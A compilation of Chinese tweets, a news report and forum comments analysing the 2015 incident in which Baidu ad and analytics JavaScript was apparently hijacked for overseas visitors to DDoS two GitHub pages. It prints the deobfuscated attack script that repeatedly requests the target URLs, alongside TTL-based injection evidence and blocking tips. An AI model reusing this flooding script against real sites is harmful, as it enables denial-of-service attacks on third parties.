如果你在国外,访问cbjs.baidu.com/js/m.js显示的代码和在国内访问该网站的代码是不同的(如图为国外访问内容)。该地址是百度广告联盟的JS脚本。该脚本插入了攻击GitHub(greatfire和cn.nytimes)的代码,也就说如果从国外或代理服务器访问嵌入百度广告联盟脚本的网站,你相当于在帮助发起针对GitHub的DDoS攻击。暂时不清楚这些代码是否是百度植入的。
“Twitter user @yegle discovers that HTTP requests to a certain JavaScript is being hijacked to some attack code, which will make reqeusts to GitHub. Since the JavaScript is used on many Chinese websites, GitHub is in fact being DDoSed. This trick is discovered by users when GitHub starts to return alert(“WARNING: malicious javascript detected on this domain”) in response to these DDoS requests. This will pop up a alert dialog with English text on those Chinese websites.”
@bitinn 已知:国外线路访问百度的CDN,有一定的可能性触发攻击Github上特定用户的页面,例如,之前刚刚被DDoS过的@GreatFireChina。值得注意的是,两次DDoS本质是一样,并没有攻击它们主站,而是DDoS它们用的云服务。这种企图劫持正常流量的网络威胁,我们来起个名字吧?
@bitinn 31m31 几年前去纽约,有幸在法拉盛(Flushing)的中国城待了几天,然后体会到了那边是怎么过马路的——即便人行道是红灯,车也要按着喇叭,才能从川流不息、无视指示灯的人群中缓慢的“推”着走。当时我有种整个华人群体的脸都给丢了的感觉。今天看Github面对的DDoS,我也有这种感觉。
国外人士有多少人会去访问百度?保不齐是墙内外协作造成的。。。
被你国势力引导的不明真相的群众攻击
彻底贯彻并落实了我党发动群众,走群众路线的攻击方式 XD
@yegle 当年iGFW还是哪里的GFW研究报告里还提到了GFW的DNS污染可以用来DDOS攻击敌对网络。还是naive了。替换js来攻击,只损失了百度的revenue,能实现单页面反复攻击多个目标。
github要不是alert,直接再重定向到我朝的任意一个gov站点,那会是什么效果。
GFW 利用百度 CDN 来 DDoS GitHub,这「创意」 -_-
China-based Cyber-Terrorism Variant = 基于中国的网络恐怖主义变种 = CCTV
@yegle 还有一个可能性。一个真正的海外用户,首选搜索引擎应该是谷歌而不是百度。那么,来自海外IP对百度的访问,多数应该是通过代理翻墙的境内用户。这样GFW就可以收集很多用户的代理IP,并且通过搜索行为等判断是否翻墙。估计又会有很多VPN和翻墙软件会失效。
@bitinn: 利用平民上网的正常流量进行DDoS已经成为中国全新的政治武器。新的被害者是:GitHub。换而言之,我们已经从Defensive变为Offensive了。
屏蔽所有百度的JS代码:在Chrome的设置->显示高级设置->隐私设置->内容设置->JavaScript->管理例外情况中,输入百度的网址(需要通配符,如图),再将行为设置为禁用即可,感谢 @Mosesofmason
开始攻击Github了,以后国家自然科学一等奖岂不是要年年空缺了
在 chrome://settings/contentExceptions#javascript 下新加了一條規則 [*.]http://baidu.com block
@oiax 继朝阳大妈成为中共国特工后,上亿网民也成了 DDoS 民间高手。
@mac_zhou 对@yegle 发现的百度JS被植入greatfire的现象进行了抓包跟踪,正常百度服务器返回给我日本VPS的TTL为51, RESP返回HTTP 200 OK的报文的TTL是 47,可以确定的是有中间设备对VPS发了伪造报文。
境外用户访问内置境内一些网站如百度的JS调用的网站时,GFW将这部分调用替换成重定向至目标网站,以挟持民用流量的方式,实现对目标网站的DDOS攻击。
—
中国的国家防火墙调用民间流量攻击境外网站
26日9时(Pacific Daylight Time,北京时间27日12时)左右开始,从境外访问v.baidu.com的时候发现会出现Javascript alert出现的弹窗:
WARNING: malicious javascript detected on this domain
追查了一下发现是百度广告管家的js http://cbjs.baidu.com/js/m.js?_=1427431567741
在境外访问时被替换成一段特殊的js。详细请求和返回的js见:http://pastie.org/10056531
在境外访问时被替换成一段特殊的js。详细请求和返回的js见:http://pastie.org/10056531
反编译后代码大致如下:
“document.write(” src=’http://libs.baidu.com/jquery/2.0.0/jquery.min.js’>\x3c/script>”);!window.jQuery&&document.write(” src=’http://code.jquery.com/jquery-latest.js’>\x3c/script>”);startime=(new
Date).getTime();var count=0;function unixtime(){var a=new Date;return
Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=[“https://github.com/greatfire/”,”https://github.com/cn-nytimes/”];NUM=url_array.length;function
r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
b;$.ajax({url:a,dataType:”script”,timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
Date).getTime()},complete:function(){responseTime=(new
Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
r_send(a){setTimeout(“r_send2()”,a)}setTimeout(“r_send2()”,2E3);”
很明显看出两个攻击目标: https://github.com/greatfire/ 和 https://github.com/cn-nytimes/
大致的流程就是:
1. GFW把某些常见网站的JS替换成以上js
2. 全球各地访问国内网站时,相当于成为DoS的源(可能还有全国各地访问国外时,未经确认)
3. GitHub不堪重负,把 https://github.com/greatfire/ 和
https://github.com/cn-nytimes/ 的返回改成一个alert: WARNING: malicious
javascript detected on this domain (网站存在恶意JS代码调用)
https://github.com/cn-nytimes/ 的返回改成一个alert: WARNING: malicious
javascript detected on this domain (网站存在恶意JS代码调用)
当境外用户访问内置境内一些网站如百度的JS调用的网站时,中国的国家防火墙GFW将这部分调用替换成重定向至目标网站,以调用民用流量的方式,实现对目标网站的DDOS攻击。中国网络审查监测机构Greatfire和纽约时报中文网目前尚未就此作出回应。
—
@tenderkuma: 看人家不顺眼就封了人家网站,然后发现人家居然不跪不服软,岂有此理!好吧那就集我朝百姓访问百度之流量DDoS你!—— 这是tm什么臭不要脸的做派… 替这种变态机构做事的技术人员是有多无骨,一泡污。
百度统计js被劫持用来DDOS Github
今天中午刷着全国最大的信息安全从业人员同性交友社区zone.wooyun.org的时候,忽然浏览器每隔2秒就不断的弹窗:
我第一反应就是不知道哪个调皮的基友又把zone给XSS了,马上打开开发者工具分析。0x01 细节之后立刻发现弹窗的js居然是从github加载的:可是为什么乌云会从github加载js呢,并且还是从greatfire和纽约时报镜像加载。第一反应是页面有xss或者js被劫持了,找了半天终于找到了,居然是hm.baidu.com/h.js这个js的确被乌云加载了没错,这是百度统计的js代码,打开后里面是一个简单加密后的js,eval了一串编码后的内容,随便找了个在线解密看了下,发现如下内容:document.write(“不是我一个人这样吧?我今天也遇到,在访问peopel.com.cn看新闻的时候,我用的是ss.com的服务,难道和这个有关?貌似许多人都遇到了,这个帖子里说是因为github受到ddos攻击引起的遇到了。
我也是在翻墙的时候看到的。
百度, 煎蛋,还是搞不明白啊, github受到攻击, 为啥这么多国内网站会被波及呢?
百度, 煎蛋, 斗鱼和github有啥关系。看起来似乎是这样的:国内好多网站上嵌入的某个js会自动载入 http://github.com/greatfire/ 和 http://github.com/cn-nytimes/ ,达到DDoS效果。GitHub看到大量流量和referer信息后决定这两个URL返回javascript然后那个页面是百度联盟的广告JS
后来的情况是国内正常,翻墙返回恶意js,不过无法稳定复现目前不清楚是GFW搞的还是百度搞的应该这样把,原来还可以这样ddos,新技能get。有点儿明白了, 就是利用嵌入脚本到其他大流量网站ddos github这两个地址。
然后github 返回的 alert代码, 所以我们才看到的alert提示的。不過不管是國際國內開不開代理開不開Adblock我都不能復現。。。是不是所有挂的百度广告联盟的都影响了。
利用百度的广告联盟进行ddos。确切的说,是百度联盟网站,这个的使用量相当大……和地区有关,我的8台服务器有两台访问百度联盟可以得到恶意代码,剩下都是正常排查了一下不是百度搞得,就是GFW替换了返回内容。。。。太强大了Comcast线路, 有这个问题.
用搬瓦工的HE线路, 没有这个问题.抓包发现是百度站长统计js脚本里被插入了奇怪的东西, 然后会执行https://github.com/greatfire/和https://github.com/cn-nytimes/上面的那个alert.临时解决办法:
"1 27.0.0.1 hm.baidu.com" >> /etc/hosts话说不知道这个事和 greatfire 有关. 我觉得这种事, 不管你的政治立场, 干扰他人的通信这种行为和TG没什么两样.我感觉不像。
因为如果是墙搞的, 这样岂不是等于给github返回任何内容的机会了?
ddos一时半会儿也搞不死的。 大量的抵达率。不需要翻墙,海外访问国内domain同样触发,应该是单纯只要加载JS就跪。理论上可以修改本地hosts屏蔽上面提到的两个url,但还没试验过囧,上面@xieyudi1990 已经提到hosts了,请无视身在香港,访问百道知道也触发。身在台湾,访问百度的子站没有触发这个js。有人黑了某几家CDN的意思么?不,GFW http劫持更正下, HE线路也会有问题.刚刚回复正常了, TTL也稳定下来了.http://cbjs.baidu.com/js/m.js是用公共库来 DDOS GitHub 的几个敏感词 repo 吧.....还能这么玩儿...感觉像是某个很奇特的地方一直在做 HTTP 劫持github的特别页面应该是他们自己做的。因为无数流量被国内各大网站导向了这两个地址。更深的原因是国内的很多js访问都被劫持了。。。访问第二个, 返回这个了
alert("WARNING: malicious javascript detected on this domain")
不翻墙, 都可以直接返回。
这下影响的面够大, 百度的服务器看来是被做了。基本上我猜测是gfw做的……因为那个github的wiki经常发布一些(呵呵)信息……但是又不能block了github对吧,所以利用劫持ddos那两个页面给github施压,已达到逼其关闭的目的……不过我很鄙视那些利用github干呵呵的事情的人,完全不考虑后果的小学生行为。所以综上所述,我支持这次行动~这和恐怖主义有何区别?(参考枪杀查理报社编辑事件)目测不能关闭github,然后就给他颜色看看了github是什么地方?如今国内github如此地步都是愤青导致的。你真的看过greatfire的wiki么?我们都在笼子里,笼外的人却在激怒笼里的老虎。他们是唯恐天下不乱的人,我不认为这样的人能促进社会进步。github被block对大家没好处,gfw如今都能定点打击了也别指望它会消失。要block我随意,不过先祈祷github安好吧分别从 国内和国外访问,在 HTTP Header 中可以得到不同的 Server。一个是 apache,另一个是 Apache。的确我现在倾向于认为是 "它们" 搞的鬼. 从海外线路访问, 握手的TTL和ICMP的TTL相同, 但是TCP会话的TTL不相同. 更让我确信这一点的理由是, TTL还是每一个包增1, 这个手法和伪造RST极其相似.
不, 我已经确定了是 "它们" 搞的. 除非是百度有内鬼在高级黑.这样说差不多。。。两台都是日本的话说明确实有一台有问题ˊ_>ˋ人在墙外,发现刚有一段一直弹对话框,显示 “WARNING: malicious javascript detected on this domain”从国外访问百度统计时会被 GFW 插入攻击 GitHub 的代码,貌似这串 js 只是简单被 pack 过而已。不不不,同一台服务器,同一次访问,TCP握手->传输数据->TCP关闭握手阶段和传输数据阶段TTL不同好像不插入那段脚本了,几分钟前还插入的这个意思好像是让能翻墙或者在国外的那部分人去 ddos greatfire,好阴险啊遇到不合理的事情,先默默接受,然后再从不愿默默接受的人身上找原因。哪儿都能碰见这种聪明的中国人。
--------
这句话说得真好。但问题时, 为什么要跳转这两个url呢? 那些家伙就不怕greatfire挂个 "习包子离岸资产" 什么的?
要攻击的话, 用其他的url也是一样的吧, 只要指向github的服务器就好...
唯一不明白的地方...不知道这下有人号召换掉百度系的服务不?所以这串攻击代码只有墙外的人会执行,并且他们有信心会很快把 GitHub 打死。Github已經宣佈一切正常要是部署在省骨干上, 还可理解. 估计唯一会访问大陆网站的, 除了留学海外党, 也就那些做贸易的, 能有多大个访问量?目前情況來看有可能是測試狀態,顯然這個測試不太成功我在用的是Vultr Tokyo 節點的VPS翻墻,IP 108.61.16?.*,沒有發現上述貼吧、鬥魚的問題,你們的VPS/server服務商或者IP段能大概告知一下嗎?发现大约10分钟前已经撤销了, 感觉访问的是真是的服务器 (TTL稳定了, 也不是单纯返回那个字符串了)现在已经撤掉了之前我在日本sakura vps和DO NY机房可以观测到(NY机房有一台有,另一台就没有),vultr东京和linode东京都没有估计是给github施压,不过这方法太蠢
